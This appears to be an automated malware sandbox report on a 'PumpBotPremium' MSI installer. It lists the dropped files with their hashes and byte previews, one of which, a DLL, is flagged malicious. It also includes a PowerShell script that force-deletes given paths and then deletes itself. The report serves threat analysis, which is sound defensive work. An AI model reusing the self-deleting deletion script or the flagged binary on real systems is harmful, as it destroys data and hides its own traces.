SSDEEP:	12288:OuYFjg26D559YpR0FeANNnJuXtmy6/EJg3LQxPmJPsJZTPt55dkHawNf:OhgzVNngEyOE+3LkuJkJ9155dkHawNf
MD5:	16427FA171BD703839D252C580C42CD0
SHA1:	268EC6C390D5FBA3AF0D3CA55ECFC65D9E232906
SHA-256:	1E84A4DA22CB64AB037AFA6CA184E080463DD870D6DB2F42DDA2414FD2311CAF
SHA-512:	52E2B47B6F461D85A689243C89C91151CD643952CD64FA0EFB00522A4DE3D4FFEFD09ADBEB524ED664B9DA0FD141EBCD5A12D780DEBD79741626183AE837C77C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................k...x.....x...........x........................................I.....!..........Rich...........PE..L....+Jd.........."!...#............k~....................................... ............@......................... M......<N..........h...............@=.......n..h@..p....................A..........@....................J..@....................text...l........................... ..`.rdata.."b.......d..................@..@.data....'...p.......N..............@....rsrc...h............d..............@..@.reloc...n.......p...j..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8CB8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	5.235530518222276
Encrypted:	false
SSDEEP:	12:Eg6TBxVVlFydR1cj//dddftEkrrrHzZxSl:iTBxDLmRCjzQkXpxW
MD5:	D2AF651F35850C56B2F62D4B0076F433
SHA1:	46722155645FB03F27B18964C60146020B29EC65
SHA-256:	BFA6D1786CD517518FECCA2459C397B159D7BABB756EB944D539761CCE24F689
SHA-512:	C66D8F92518852B70E9472D368CA9641739ECBD49499FBDC393049A4795EDE50CBD1B05B3022F9814F48498AE600F22DE35DBB243DA4502C6F3476D2320BCF59
Malicious:	false
Preview:	...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{26BCD435-D353-42A0-8C43-818FC0FA354F}..PumpBotPremium..PumpBotPremium.msi.@.....@.....@.....@........&.{7FFEF896-5843-4272-ACBA-A4977C267D92}.....@.....@.....@.....@.......@.....@.....@.......@......PumpBotPremium......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_LaunchChainer....J...AI_LaunchChainer.@....[.C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe...@.....@.....@....

C:\Windows\Installer\SourceHash{26BCD435-D353-42A0-8C43-818FC0FA354F}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1658211416534288
Encrypted:	false
SSDEEP:	12:JSbX72Fj4AGiLIlHVRpFh/7777777777777777777777777vDHFHIAdh6lLql0i5:JeQI5ByAdIZF
MD5:	FAD7554DEABFDBEE29EBDE47ACAF23B7
SHA1:	4C1C1ECA731BD220D9F38BB2CBD01BD14562ADC0
SHA-256:	A566DB542CEFCF52742459215513DF194E7A497C18C88B7F2BE70F09A3CA0746
SHA-512:	9284138C13284E7941B93F36A482691C6EA1103167E764C1FB168BCEF77E3108BDDDCE8F9A71BA868EDA79C9DED5FADB3A82A40DACE09CD70E486BBC91C2B25D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5369349390309766
Encrypted:	false
SSDEEP:	48:G8Ph8uRc06WXJMFT5ylW/w40lZUdQ0SkdQ+AEkrCyFxoldQ0SkdQEPbxI:Zh81vFTUn4c6QRCv3xI
MD5:	9B6CEF056EA4B4ED2F87996CA694F72F
SHA1:	B6688CA463B8E65E42D0157DC839837BA972F1C2
SHA-256:	4A07078A6CE785043206957FB50AA52503135D2D4E5B5E4C6FDE959814BDD016
SHA-512:	C433C422B8E95140E267B3216AB844A4438225CD254D048B52ABF3677CECD53F21188D63015AADF0DF7ECD7738DB8A63DB26AC7D77A36D76BF1641131F9C2356
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375162626297012
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau/:zTtbmkExhMJCIpErS
MD5:	0330E76C02D07A423B46CD51985DAF64
SHA1:	AF44870F926D394B298EDDE30371E05F6A8E815A
SHA-256:	AE1124BB81234F446524D3E162B7E01FC994AFD30264BBA5A7ED9BD23CB33626
SHA-512:	3702612D53E071288CDEDB61C627B9BB8174664B7EB6559461F72ED9DDE629381BE07796D717E358840E59FFCB46472EEB584B47C106B8FF1585427EAAB8623D
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3676
Entropy (8bit):	6.347211948497124
Encrypted:	false
SSDEEP:	48:5APuDaTZZ7TFszwRMVs2UYrram6mt0u17vxxNFBuweqNKlMVCbHnwvN4y9v0vqv4:NDEZNFs4Yi4tp1b9teq0ECbyrq2mRJv
MD5:	2C3719839A68C559738D560BD17E99E2
SHA1:	4C911C0E95E0991DE4489408BFDA4529A7DD4929
SHA-256:	646861640AE8979B3EFA4DCE99D6CD4A96164C251A7CC4254A936E1F370BD10F
SHA-512:	EF4A47BF9E64D701747BD0BC64671442CE0D3186D14F87C6458B33820F8070D6D5BE99905B91EBA2428DCF6799E7F6EB984EB1F73B6FC20D2FEB8A82F9D579A1
Malicious:	false
Preview:	0..X0..@...0....H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 01..241030181308Z..241107183308Z0..N02..3...&.....>.....&..241019020741Z0.0...U.......02..3....Y.2............241008025714Z0.0...U.......02..3....y.(.j.E.........241006030834Z0.0...U.......02..3....... ............241004031956Z0.0...U.......02..3......<...........241002033118Z0.0...U.......02..3....!..>^...........241001033711Z0.0...U.......02..3........u..........240924041707Z0.0...U.......02..3...5..S...;.....5..240920044003Z0.0...U.......02..3....K.8.......*..240919043443Z0.0...U.......02..3..}....%.?r....}...240915024003Z0.0...U.......02..3..qF.N .........qF..240905033813Z0.0...U.......0$..3..q....G.'......q...240904233037Z02..3..j......u......j...240830041742Z0.0...U.......02..3..h..q...o....h...240829042339Z0.0...U.......02..3..h.i...{.......h...240828234907Z0.0...U.......02..3..g.)...A.......g...240828042937Z0.0...U.......02..3..d.U.f:`......d...24082

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	7.618663027493734
Encrypted:	false
SSDEEP:	48:yqNUFx1gQZmMjh//4euDhJjnuPSPe9iNI3WowFzVDlAv5p+Aj5oKeSHdct:yHFx13ZJjJgnDhJLuANN9m5IO5oKeSs
MD5:	5FA012BCA671C7617DCF5195C7FDD489
SHA1:	3D21596B39D0209AC95DDC421B70132715B8F129
SHA-256:	F772D70FACADF8134825484C9340A50B4EA706FF5EED09C1363B5CF5E1A1D6CB
SHA-512:	876DDCCF1432B18596AD9085C7B1BB7F657EEACF2244DED6DEBD498DB7BDFA80928498399AC632E49EA30161FA9716FBB31272497E9DEB2C9669B2C31362E599
Malicious:	false
Preview:	0..u......n0..j..+.....0.....[0..W0..............w...^..6.P..20241026213012Z0..0..0L0...+..............wzb......Z..7...~.j.......'.P.Oh....3......4.{.............20240903182619Z....20241203064619Z. 0.0...+.....7......241202183619Z0....H.................)...u...qa...^..]..J..:..y.hS...9..2...m..o.Au..^.."0...(..p....Jq.....L>.Z.g.[y.....b.....'Y..Z:.8...d"...vl.W.%.-.M]n...e\...$..[..p..w.IlB........X.yn.;a.m-..P.r.t'.....:@.............V......?#"]..i..O.......}J....H.X.........iB_.C....$....3..l8...\qE.....d.-...G.s......b......h.u.....x._....m..@..O.QV?v..W........=y..c.......OA.u.&.....7....g...sP.......y...FK.<pj]@m...+.q.....ks&..I./.8.M.....hh...5../.....g..2}.}A.Z,R.6h<......w2.Q_H..Az..........e........Y..U....+n......w0..s0..o0..W.......3.......`.".W......0...*.H........0w1.0...U....US1.0...U....Microsoft Corporation1H0F..U...?Microsoft Identity Verification Root Certificate Authority 20200...240814185829Z..250214185829Z0w1.0...U....US1.0...U..

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2629
Entropy (8bit):	7.603576801902435
Encrypted:	false
SSDEEP:	48:sFMxLaAnk9uDjRqnuN7WXvJZRhyFlDqcAvJAjDKW1yjZ7L+DVXKCm:sFeaUNDjRIuNSXRtcmJODKsylL+DVXZm
MD5:	B840A82029ADA1C29A20CE8C2EA68E55
SHA1:	90E0AE35FB1240DD14A144E8A4C7796760F40746
SHA-256:	651FF994F3A8E83365FF038223EC12E2E48A82EFCC391249912CC7417F3E6D3D
SHA-512:	F7E8EF340794667DA4A68C22657076158107B5D1E1A0BFEE7A6A4E045D2B6345C502443E1E8FC8166CEC7103C95BCA41CF4D89C0CC46DA1363E9A2EF376CC162
Malicious:	false
Preview:	0..A......:0..6..+.....0.....'0..#0..........b.)..u..(..$..;..20241026213030Z0..0..0L0...+.........A..HNF;.ZEW..}...@...A)...cl.i...)..Hj0...3....7.[..[............20241014201231Z....20250113083231Z. 0.0...+.....7......250112202231Z0....H................m..n...P......#.j-c...].._....s.LA=..b.F.,e.bd....j.q$n.A../.\..4s.....Zcm\....D+~_6..q....Uf...K.T.\.y9.e$~C...Wq{....4S....n.b........m^Q.0.......pPr.Y.3....\|..s.7.Y.Yp.\|.\.)3..Dh;.o3.7..6.?...Y.C...)...#.3....<...rN....T.=.s....T......y....(..........'.k..............-..S..,.oq%..jKSt.{].......5.....$._.!=.R.6M&..k.....9>..g.....x.HEk..k"......c.3.@\|.......\.?....X..I..U.n):.+.S.N^Haw..r..^..w2...lR.".........KA..WI.;"...L@^..R..+..2'...]..1...4..rl...T..~..+'C.r..+...R......^H.:...C0..?0..;0..#.......3..........7......0....H........0c1.0...U....US1.0...U....Microsoft Corporation1402..U...+Microsoft ID Verified Code Signing PCA 20210...240814191417Z..250214191417Z0..1.0...U....US1.0...U....WA1.0...U....Redm

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2019
Entropy (8bit):	7.463800110661284
Encrypted:	false
SSDEEP:	48:kBa0diQ0d/ePuDaTZbNuuOYWAqnJyXhYzOAvz1AjshqJD92eqa3XnU:NblZDEZputPAqUXVmz1OsEJJXnU
MD5:	DD836BEE918E0C7146535B5458036E23
SHA1:	77B78118046565651EBF2E37DD87AA1B12906F42
SHA-256:	3A632801AEAAB2D86EC5E353A74679568D6548E2DCF48B6477A473192E8F582F
SHA-512:	F4FF076EC088F26299B1CAC35F323C5A98DEEFBC88EF08EEB9C8D6E64AE95F05312A46A796400F90820E02249257EBED9E1851333FF194B9F3F89EDE9C7E3B38
Malicious:	false
Preview:	0..........0.....+.....0......0...0.........d.>....9I.+.....20241027004941Z0..0..0L0...+........A..T.S'..M...$..ng....3....v......^X...3...w....V].L.....w....20241026221308Z....20241101155013Z. 0.0...+.....7......241030222308Z0....H.................h...Ka.X.......9<..".T....7..t..............y.e'7...f.g..A.V...K.w.{.....}....'k...{Er...c...k.......q$....J..\N.x4....H.....q^TD..~QT...E.=....1.O..<.{..E........l....=y=...m(.H.t>.m....].i`!.y.......,..Z.!.l.u9.mKL....FW}.\|#/.G....-"...Ho......0...0...0.........3........\.......0....H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 010...241025155013Z..241101155013Z0^1.0...U....MSIDAOC01 OCSP Cert1.0...U....Microsoft1.0...U....Redmond1.0...U....WA1.0...U....US0.."0....H.............0.................pK.,<.2..q6...........3.o.r.6....?.'..8..z.JY..s....R.....a...i.?P..@.Q.@C...e....U..ZE..f$`Xc...u.g.~.9....2.w......7.j..L......8..P:Z..H.H.7_C.t.f...%...)....y

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07A7CCFBD28A674D95D3BF853C9007C6

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.0496826659431306
Encrypted:	false
SSDEEP:	3:kkFkl9/XfllXlE/sqe++stlt1DRjdClRRly+MlMTlPNylRal1VdlV0lQWKAX4Vh0:kK83klLB7WTlpl19ml5o8lAKj
MD5:	45F9417F993E5862006674311913AFD0
SHA1:	DABFB28EF11C0099A75C58B284B32408F5E154CC
SHA-256:	CEBD12677660E3396E1588B1E700C4DE18878F0C4EFC92F37D7AFCD5E0317C14
SHA-512:	86C263ACF744BAF0D3143141E0361458E63A4A650A103813DD98099E450FC89C8DD26279774E9A9CDC93394F351A76518EDB2BE31FCB1EC69A5F5F3EB2E65A83
Malicious:	false
Preview:	p...... .........r..+..(....................................................... ..........{.*..................\...h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.p.k.i.o.p.s./.c.r.l./.M.i.c.r.o.s.o.f.t.%.2.0.I.D.%.2.0.V.e.r.i.f.i.e.d.%.2.0.C.S.%.2.0.A.O.C.%.2.0.C.A.%.2.0.0.1...c.r.l...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	556
Entropy (8bit):	4.071739108223117
Encrypted:	false
SSDEEP:	12:mJMlzcWuxlX9ysFuuPtuRaoKpRcYlQKlUEoWqDll:mJdWuxlX9VkuVu4oKRZltG5l
MD5:	54467B72016AD80A933F7F69272A8003
SHA1:	4D5DAF779C99FDAA1B2A576624CFE2D819E60466
SHA-256:	0EBEFCCA825764BAD476F1B018D25810B7C461465DE5D8DEEEFDD791927A94B9
SHA-512:	906C5C7AE75D6C01B7B5AFEBA552A7DDF74B2E87E1241343837685A50E80004A553D9FEFD777769EA5D6CB5DCFDBCAE2762F3E4186F3135C3788C2AD798B0EC9
Malicious:	false
Preview:	p...... ....2.....s.+..(...........................OE.......D..............OE.. ...........:'...Q..............y...h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.D.H.s.f.u.q.f.u.b.d.3.p.i.h.v.q.4.m.g.Q.V.W.g.H.W.N.w.Q.U.y.H.7.S.a.o.U.q.G.8.o.Z.m.A.Q.H.J.8.9.Q.E.E.9.o.q.K.I.C.E.z.M.A.A.A.A.H.h.6.M.0.o.3.u.l.j.h.w.A.A.A.A.A.A.A.c.%.3.D...".0.2.0.2.b.1.0.a.b.8.e.4.3.a.4.0.9.5.5.c.2.8.0.0.6.c.1.7.e.1.6.5.e.7.e.5.7.d.0.b.f.f.b.0.2.b.2.a.0.3.f.d.a.7.9.a.0.6.8.c.c.5.b.d."...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	560
Entropy (8bit):	4.054787545028411
Encrypted:	false
SSDEEP:	12:OblMlyMcWuxlX9ysFPH+ee+lHRoW+iZGf3sb2WEI/Tg3N:OblZPWuxlX9Va+lHdI3sb2WEI/TI
MD5:	2DAD59D98A049D64E85637ED3C46071E
SHA1:	0943145613BD9483B8CC26A7B7987A46114E8AD2
SHA-256:	FCC88A850AE55B338D40FD3BFDE8FA59E6F2FCC0141D513D77BF1F310CBA125E
SHA-512:	E4E8AF092A243F1AD379B96F642DA54DBCF92CAD50CFB18830A0741D05A2B360A8BFB1C7A66EB3F68766315075C77225870D251366668896333E355C556E583F
Malicious:	false
Preview:	p...... ....6.....u..+..(..................fu....y...e...../e...........y...e.. ...........:'...Q..............E...h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.O.Q.Y.L.F.S.E.5.G.O.%.2.F.p.a.R.V.f.Y.u.7.d.9.g.Z.E.b.Q.A.Q.U.2.U.E.p.s.A.8.P.Y.2.z.v.a.d.f.1.z.S.m.e.p.E.h.q.M.O.Y.C.E.z.M.A.A.A.A.H.N.4.x.b.o.d.l.b.j.N.Q.A.A.A.A.A.A.A.c.%.3.D...".c.f.8.f.b.b.0.1.3.2.5.0.0.0.4.6.e.e.d.1.8.5.9.6.0.d.5.b.8.0.a.7.0.a.0.c.3.0.f.a.f.1.0.4.4.9.a.e.3.7.e.1.e.3.9.7.2.b.f.e.c.e.7.8."...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	556
Entropy (8bit):	3.611632656907546
Encrypted:	false
SSDEEP:	12:XhHlPXLqcWuxlX9ysF/n2v2+ZFLaNC7+RUoxuaXRmN:3L5WuxlX9V92O+Z5alRU8tX8N
MD5:	F0554417EDBBEA3F6B322DEEED8A49EE
SHA1:	95325A4ABE28B59EC0AC437F28D0BC017B8FF288
SHA-256:	4334D82B531E85823208D489DC4AE5A62A717A132FCCBC155C330D299FC2E0C7
SHA-512:	890D028BE665B65C00027596677C232695AD2AA0DCD986479DD1AAA752FF805A35D150EFC83ADA705A743ED9BD387614E19FDB79CC4348C44A1363ABDF917F14
Malicious:	false
Preview:	p...... ....2....db..+..(....................................................... ...........:'...Q..................h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.R.B.q.8.1.U.G.1.M.n.D.O.V.N.K.q.f.f.0.S.S.E.z.6.J.u.Z.w.Q.U.6.I.P.E.M.9.f.c.n.w.y.c.d.p.o.K.p.t.T.f.h.6.Z.e.W.O.4.C.E.z.M.A.A.H.9.3.o.7.3.n.y.F.Z.d.E.U.w.A.A.A.A.A.f.3.c.%.3.D...".4.7.f.a.d.a.9.5.0.0.f.4.d.1.3.7.4.a.4.7.b.d.c.2.d.1.7.3.6.e.a.e.9.5.2.2.f.5.0.5.9.6.e.1.2.2.9.2.0.3.6.7.6.d.5.6.6.6.0.7.4.0.b.3."...

C:\Windows\SystemTemp\AI_D021.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23157
Entropy (8bit):	6.0243033942126525
Encrypted:	false
SSDEEP:	384:gsgQpJjMUmMZYvqsB9tq5Pr056H46ftIj3OD1uz9p/fO7ywaX:eQpJjMUOvdEYSFIzpN6gX
MD5:	54A3795308331741EBDC2B0B754EF911
SHA1:	4D49846CF892E0B7DABC8407C1F8B0459994951C
SHA-256:	27545C48DFE53E90915094E4E033E344E316D43832C954851640B7886E97828E
SHA-512:	E00678822BCC457CD1ADFEF44EF25D734986F1F7B23AB3582D3968EEF38C70A91CB1B11F933DA2EA31324A553127EDA9D76DA87B0DCB6E79C66E2356C81DB309
Malicious:	false
Preview:	param(.. [Parameter(Mandatory = $true)].. [string[]]$paths,.. [int]$retry_count = 0..)....# Delete paths using parallel jobs. ..$jobs = $paths \| ForEach-Object {.. Start-Job -ScriptBlock {.. param(.. [string]$path,.. [int]$retry_count = 0.. ).... if (Test-Path -LiteralPath $path) {.. $count = 0.. while ($true) {.. Remove-Item -LiteralPath $path -Force.. if (-not (Test-Path -LiteralPath $path) -or ($count -ge $retry_count)) {.. return;.. }.. $count++.. Start-Sleep -s 5 #sleep 5 seconds.. } .. }.. } -ArgumentList $_, $retry_count ..}....# Wait for the delete jobs to finish..Wait-Job -Job $jobs....# Self delete..Remove-Item -Path $MyInvocation.MyCommand.Source....# SIG # Begin signature block..# MII9SwYJKoZIhvcNAQcCoII9PDCCPTgCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMC

C:\Windows\Temp\~DF0D53DC9C7BBFC774.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF47F5555B91963625.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.12714218031324281
Encrypted:	false
SSDEEP:	48:LxI2QHdQ0SkdQJdQ0SkdQ+AEkrCyFxo1blf4t/2l:LxIx+QRCPf4E
MD5:	928CC3DE790FED15CC2D8AEEA7B0B902
SHA1:	36DDA612AC8FAC9193C85B3B80D7E051013786FF
SHA-256:	800FAA6C99D0408381EF0928E9930AF826938346754F3954D24B0DA2ABCF3515
SHA-512:	AC0D892120679D560FD6E3F08EA7CD92BD07E6573D44BE9A99F0D5BC104DCC8B41B522CA15E393F4D3B55CA52F1A9F8341E27A3963EEA0BA8FF503054B8FD640
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF50561FB6F2C930BB.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5ABBBEBDCE86EACC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8CFE24CFB6B9F8D8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9E6F418B6A9C8200.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2337369036186212
Encrypted:	false
SSDEEP:	48:2L0uNO+CFXJBT5glW/w40lZUdQ0SkdQ+AEkrCyFxoldQ0SkdQEPbxI:U05ZT6n4c6QRCv3xI
MD5:	BFE59EF4DFE090A62D5949042A985FDC
SHA1:	140430768AEAF60F6CCAD27037A0B4DABAFC7EA0
SHA-256:	5C7434BE12A182C129C6867E32C21EB0A9B8AABEF8BA79F6B2329FB7B58833BB
SHA-512:	AF3969102C3ACBD7977E219A97F722C68C51796C41444169F5AB9DAE97A7BA88CE8CC7D06E873A29AA452915C921EFAE9E882599F6B5E8B8170913D5C30CE336
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA019D68DC125F497.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2337369036186212
Encrypted:	false
SSDEEP:	48:2L0uNO+CFXJBT5glW/w40lZUdQ0SkdQ+AEkrCyFxoldQ0SkdQEPbxI:U05ZT6n4c6QRCv3xI
MD5:	BFE59EF4DFE090A62D5949042A985FDC
SHA1:	140430768AEAF60F6CCAD27037A0B4DABAFC7EA0
SHA-256:	5C7434BE12A182C129C6867E32C21EB0A9B8AABEF8BA79F6B2329FB7B58833BB
SHA-512:	AF3969102C3ACBD7977E219A97F722C68C51796C41444169F5AB9DAE97A7BA88CE8CC7D06E873A29AA452915C921EFAE9E882599F6B5E8B8170913D5C30CE336
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA2D8E9CF71AD6417.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.0729299840369834
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOJJUpA6G93tIplltwVky6lq:2F0i8n0itFzDHFHIAdh6lLq
MD5:	92D72E7A7AC6DBB374BB8F674F78739B
SHA1:	EC9EFB6B13289E182443FBF505E74EF9DB5C404A
SHA-256:	5064FB103B7EBA4963CB58E2350D3B3203ACA16A542285B799312E7DD547AB5D
